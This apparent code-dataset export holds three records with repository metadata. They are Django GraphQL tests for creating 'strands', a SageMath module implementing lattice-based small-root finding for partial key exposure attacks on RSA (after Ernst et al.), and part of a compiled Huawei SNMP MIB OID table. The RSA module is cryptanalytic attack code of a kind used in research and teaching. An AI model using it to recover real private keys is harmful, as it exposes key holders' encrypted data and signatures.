] | 3 | 2020-06-05T18:21:51.000Z | 2021-06-10T20:25:15.000Z | tests/func/strands/test_create_strand.py | tadasant/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
] | null | null | null | import pytest
from tests.resources.MutationGenerator import MutationGenerator
class TestCreateStrand:
# TODO: Break out creating strands as superuser vs regular user after v0.3
@pytest.mark.django_db
def test_unauthenticated(self, client, strand_factory, user_factory, team_factory):
saver = user_factory()
owner = team_factory()
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=saver.id,
owner_id=owner.id)
response = client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == 'Unauthorized'
@pytest.mark.django_db
def test_invalid_saver(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id + 1,
owner_id=owner.id)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == str({'saver_id':
[f'Invalid pk "{jimmy.id + 1}" '
f'- object does not exist.']
})
@pytest.mark.django_db
def test_invalid_owner(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id + 1)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == str({'owner_id':
[f'Invalid pk "{owner.id + 1}" '
f'- object does not exist.']
})
@pytest.mark.django_db
def test_valid_add_existing_tags(self, superuser_client, user_factory, team_factory, strand_factory, tag_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id,
tags=[tag_factory().name, tag_factory().name])
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['title']
assert len(response.json()['data']['createStrand']['strand']['tags']) == 2
@pytest.mark.django_db
def test_valid_create_new_tags(self, superuser_client, user_factory, team_factory, strand_factory, tag_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id,
tags=[tag_factory.build().name, tag_factory.build().name])
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['title']
assert len(response.json()['data']['createStrand']['strand']['tags']) == 2
@pytest.mark.django_db
def test_valid_no_title(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=None,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['body']
| 52.333333 | 118 | 0.501552 | 532 | 6,123 | 5.584586 | 0.148496 | 0.032986 | 0.033322 | 0.075395 | 0.878492 | 0.869404 | 0.852911 | 0.838102 | 0.838102 | 0.838102 | 0 | 0.00788 | 0.398987 | 6,123 | 116 | 119 | 52.784483 | 0.799457 | 0.011759 | 0 | 0.744681 | 0 | 0 | 0.070921 | 0 | 0 | 0 | 0 | 0.008621 | 0.180851 | 1 | 0.06383 | false | 0 | 0.021277 | 0 | 0.095745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7dd23cbc8f70e7e69469880804d12898c890cc4 | 5,519 | py | Python | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 139 | 2020-10-26T00:43:15.000Z | 2022-03-28T20:00:46.000Z | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 6 | 2021-06-21T05:59:04.000Z | 2022-02-17T22:50:42.000Z | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 22 | 2021-07-01T08:42:54.000Z | 2022-03-20T20:27:18.000Z | import logging
from math import gcd
from sage.all import RR
from sage.all import ZZ
from shared import small_roots
def integer_trivariate_1(f, m, t, W, X, Y, Z, check_bounds=True, roots_method="resultants"):
"""
Computes small integer roots of a trivariate polynomial.
More information: Ernst M. et al., "Partial Key Exposure Attacks on RSA Up to Full Size Exponents" (Section 4.1.1)
:param f: the polynomial
:param m: the parameter m
:param t: the parameter t
:param W: the parameter W
:param X: an approximate bound on the x roots
:param Y: an approximate bound on the y roots
:param Z: an approximate bound on the z roots
:param check_bounds: whether or not we should check bounds (default: True)
:param roots_method: the method to use to find roots (default: "resultants")
:return: a generator generating small roots (tuples of x and y roots) of the polynomial
"""
pr = f.parent()
x, y, z = pr.gens()
tau = t / m
if check_bounds and RR(X) ** (1 + 3 * tau) * RR(Y) ** (2 + 3 * tau) * RR(Z) ** (1 + 3 * tau + 3 * tau ** 2) > RR(W) ** (1 + 3 * tau):
logging.debug(f"Bound check failed for m = {m}, t = {t}")
return
R = f.constant_coefficient()
while gcd(R, X) != 1:
X += 1
while gcd(R, Y) != 1:
Y += 1
while gcd(R, Z) != 1:
Z += 1
while gcd(R, W) != 1:
W += 1
n = (X * Y) ** m * Z ** (m + t) * W
assert gcd(R, n) == 1
f_ = (pow(R, -1, n) * f % n).change_ring(ZZ)
logging.debug("Generating shifts...")
shifts = set()
monomials = set()
for i in range(m + 1):
for j in range(m - i + 1):
for k in range(j + 1):
g = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m - j) * Z ** (m + t - k)
shifts.add(g)
monomials.update(g.monomials())
for k in range(j + 1, j + t + 1):
h = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m - j) * Z ** (m + t - k)
shifts.add(h)
monomials.update(h.monomials())
for i in range(m + 2):
j = m + 1 - i
for k in range(j + 1):
g_ = n * x ** i * y ** j * z ** k
shifts.add(g_)
monomials.update(g_.monomials())
for k in range(j + 1, j + t + 1):
h_ = n * x ** i * y ** j * z ** k
shifts.add(h_)
monomials.update(h_.monomials())
L = small_roots.fill_lattice(shifts, monomials, [X, Y, Z])
L = small_roots.reduce(L)
polynomials = small_roots.reconstruct_polynomials(L, monomials, [X, Y, Z])
for roots in small_roots.find_roots(f, polynomials, pr, method=roots_method):
yield roots[x], roots[y], roots[z]
def integer_trivariate_2(f, m, t, W, X, Y, Z, check_bounds=True, roots_method="resultants"):
"""
Computes small integer roots of a trivariate polynomial.
More information: Ernst M. et al., "Partial Key Exposure Attacks on RSA Up to Full Size Exponents" (Section 4.1.2)
:param f: the polynomial
:param m: the parameter m
:param t: the parameter t
:param W: the parameter W
:param X: an approximate bound on the x roots
:param Y: an approximate bound on the y roots
:param Z: an approximate bound on the z roots
:param check_bounds: whether or not we should check bounds (default: True)
:param roots_method: the method to use to find roots (default: "resultants")
:return: a generator generating small roots (tuples of x and y roots) of the polynomial
"""
pr = f.parent()
x, y, z = pr.gens()
tau = t / m
if check_bounds and RR(X) ** (2 + 3 * tau) * RR(Y) ** (3 + 6 * tau + 3 * tau ** 2) * RR(Z) ** (3 + 3 * tau) > RR(W) ** (2 + 3 * tau):
logging.debug(f"Bound check failed for m = {m}, t = {t}")
return
R = f.constant_coefficient()
while gcd(R, X) != 1:
X += 1
while gcd(R, Y) != 1:
Y += 1
while gcd(R, Z) != 1:
Z += 1
while gcd(R, W) != 1:
W += 1
n = X ** m * Y ** (m + t) * Z ** m * W
assert gcd(R, n) == 1
f_ = (pow(R, -1, n) * f % n).change_ring(ZZ)
logging.debug("Generating shifts...")
shifts = set()
monomials = set()
for i in range(m + 1):
for j in range(m - i + 1):
for k in range(m - i + 1):
g = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m + t - j) * Z ** (m - k)
shifts.add(g)
monomials.update(g.monomials())
for j in range(m - i + 1, m - i + t + 1):
for k in range(m - i + 1):
h = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m + t - j) * Z ** (m - k)
shifts.add(h)
monomials.update(h.monomials())
for i in range(m + 2):
for j in range(m + t + 2 - i):
k = m + 1 - i
g_ = n * x ** i * y ** j * z ** k
shifts.add(g_)
monomials.update(g_.monomials())
for i in range(m + 1):
j = m + t + 1 - i
for k in range(m - i + 1):
h_ = n * x ** i * y ** j * z ** k
shifts.add(h_)
monomials.update(h_.monomials())
L = small_roots.fill_lattice(shifts, monomials, [X, Y, Z])
L = small_roots.reduce(L)
polynomials = small_roots.reconstruct_polynomials(L, monomials, [X, Y, Z])
for roots in small_roots.find_roots(f, polynomials, pr, method=roots_method):
yield roots[x], roots[y], roots[z]
| 35.606452 | 137 | 0.517304 | 887 | 5,519 | 3.158963 | 0.121759 | 0.039971 | 0.034261 | 0.01142 | 0.927195 | 0.915774 | 0.910778 | 0.901856 | 0.891506 | 0.881156 | 0 | 0.019068 | 0.334843 | 5,519 | 154 | 138 | 35.837662 | 0.744211 | 0.236456 | 0 | 0.803922 | 0 | 0 | 0.0337 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.019608 | false | 0 | 0.04902 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7eb7ee4ef38ed4e24c1a5777d71fc1dd5efd3e7 | 20,785 | py | Python | cmibs/huawei_sys_man_mib.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | cmibs/huawei_sys_man_mib.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | cmibs/huawei_sys_man_mib.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# HUAWEI-SYS-MAN-MIB
# Compiled MIB
# Do not modify this file directly
# Run ./noc make-cmib instead
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# MIB Name
NAME = "HUAWEI-SYS-MAN-MIB"
# Metadata
LAST_UPDATED = "2002-12-20"
COMPILED = "2019-03-03"
# MIB Data: name -> oid
MIB = {
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIB": "1.3.6.1.4.1.2011.5.25.19",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBObjects": "1.3.6.1.4.1.2011.5.25.19.1",
"HUAWEI-SYS-MAN-MIB::hwSysClock": "1.3.6.1.4.1.2011.5.25.19.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysLocalClock": "1.3.6.1.4.1.2011.5.25.19.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurrent": "1.3.6.1.4.1.2011.5.25.19.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCurTable": "1.3.6.1.4.1.2011.5.25.19.1.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurEntry": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurEntPhysicalIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurCFGFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCurImageIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysCurPafFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysCurLicenseIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysCurPatchFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysCurVoiceFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysReload": "1.3.6.1.4.1.2011.5.25.19.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadSchedule": "1.3.6.1.4.1.2011.5.25.19.1.3.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadAction": "1.3.6.1.4.1.2011.5.25.19.1.3.2",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleTable": "1.3.6.1.4.1.2011.5.25.19.1.3.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleEntry": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadEntity": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysReloadCfgFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadImage": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysReloadReason": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleTime": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysReloadRowStatus": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPafFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.8",
"HUAWEI-SYS-MAN-MIB::hwSysReloadLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.9",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPatchFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.10",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPatchState": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.11",
"HUAWEI-SYS-MAN-MIB::hwSysReloadOperateDestType": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.12",
"HUAWEI-SYS-MAN-MIB::hwSysReloadOperateDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.13",
"HUAWEI-SYS-MAN-MIB::hwSysReloadVoiceFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.14",
"HUAWEI-SYS-MAN-MIB::hwSysReboot": "1.3.6.1.4.1.2011.5.25.19.1.3.4",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEnable": "1.3.6.1.4.1.2011.5.25.19.1.3.5",
"HUAWEI-SYS-MAN-MIB::hwSysLatestRebootErrorInfo": "1.3.6.1.4.1.2011.5.25.19.1.3.6",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchTable": "1.3.6.1.4.1.2011.5.25.19.1.3.7",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEntry": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchChassisNum": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchOperType": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEnableStatus": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysDelayReboot": "1.3.6.1.4.1.2011.5.25.19.1.3.8",
"HUAWEI-SYS-MAN-MIB::hwSysImage": "1.3.6.1.4.1.2011.5.25.19.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysImageNum": "1.3.6.1.4.1.2011.5.25.19.1.4.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageTable": "1.3.6.1.4.1.2011.5.25.19.1.4.2",
"HUAWEI-SYS-MAN-MIB::hwSysImageEntry": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageIndex": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageName": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysImageSize": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysImageLocation": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysImageVersion": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysImageReason": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFile": "1.3.6.1.4.1.2011.5.25.19.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileNum": "1.3.6.1.4.1.2011.5.25.19.1.5.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileTable": "1.3.6.1.4.1.2011.5.25.19.1.5.2",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileName": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileSize": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileReason": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysPafFile": "1.3.6.1.4.1.2011.5.25.19.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileNum": "1.3.6.1.4.1.2011.5.25.19.1.6.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileTable": "1.3.6.1.4.1.2011.5.25.19.1.6.2",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileName": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileSize": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileVersion": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileNum": "1.3.6.1.4.1.2011.5.25.19.1.7.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileTable": "1.3.6.1.4.1.2011.5.25.19.1.7.2",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileName": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileSize": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatch": "1.3.6.1.4.1.2011.5.25.19.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchBase": "1.3.6.1.4.1.2011.5.25.19.1.8.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileNum": "1.3.6.1.4.1.2011.5.25.19.1.8.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchRecordReset": "1.3.6.1.4.1.2011.5.25.19.1.8.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryTableMax": "1.3.6.1.4.1.2011.5.25.19.1.8.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchTrapEnble": "1.3.6.1.4.1.2011.5.25.19.1.8.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTableMax": "1.3.6.1.4.1.2011.5.25.19.1.8.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchId": "1.3.6.1.4.1.2011.5.25.19.1.8.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchLatestId": "1.3.6.1.4.1.2011.5.25.19.1.8.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchFailReason": "1.3.6.1.4.1.2011.5.25.19.1.8.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchFileTable": "1.3.6.1.4.1.2011.5.25.19.1.8.2",
"HUAWEI-SYS-MAN-MIB::hwPatchFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchFileSize": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchFileVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchTable": "1.3.6.1.4.1.2011.5.25.19.1.8.4",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadDestType": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadState": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.3",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchRowState": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.51",
"HUAWEI-SYS-MAN-MIB::hwPatchInfo": "1.3.6.1.4.1.2011.5.25.19.1.8.5",
"HUAWEI-SYS-MAN-MIB::hwPatchTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1",
"HUAWEI-SYS-MAN-MIB::hwPatchEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchSlotIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchUsedFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchDescription": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchProgramVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchFuncNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchTextLen": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchDataLen": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchType": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.10",
"HUAWEI-SYS-MAN-MIB::hwPatchBuildTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.11",
"HUAWEI-SYS-MAN-MIB::hwPatchActiveTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.12",
"HUAWEI-SYS-MAN-MIB::hwPatchAdminStatus": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.13",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateState": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.14",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateDestType": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.15",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.16",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2",
"HUAWEI-SYS-MAN-MIB::hwPatchStateEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1",
"HUAWEI-SYS-MAN-MIB::hwPatchNumMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchIdleNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchTextMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchDataMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTextUsed": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchStateDataUsed": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTotalPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTempPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchStateCommonPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchStateRuningPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.10",
"HUAWEI-SYS-MAN-MIB::hwPatchStateActivePatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.11",
"HUAWEI-SYS-MAN-MIB::hwPatchStateDeactivePatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.12",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryProgrameVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.3",
"HUAWEI-SYS-MAN-MIB::hwSlotId": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.4",
"HUAWEI-SYS-MAN-MIB::hwPacthBeginIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchEndIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.6",
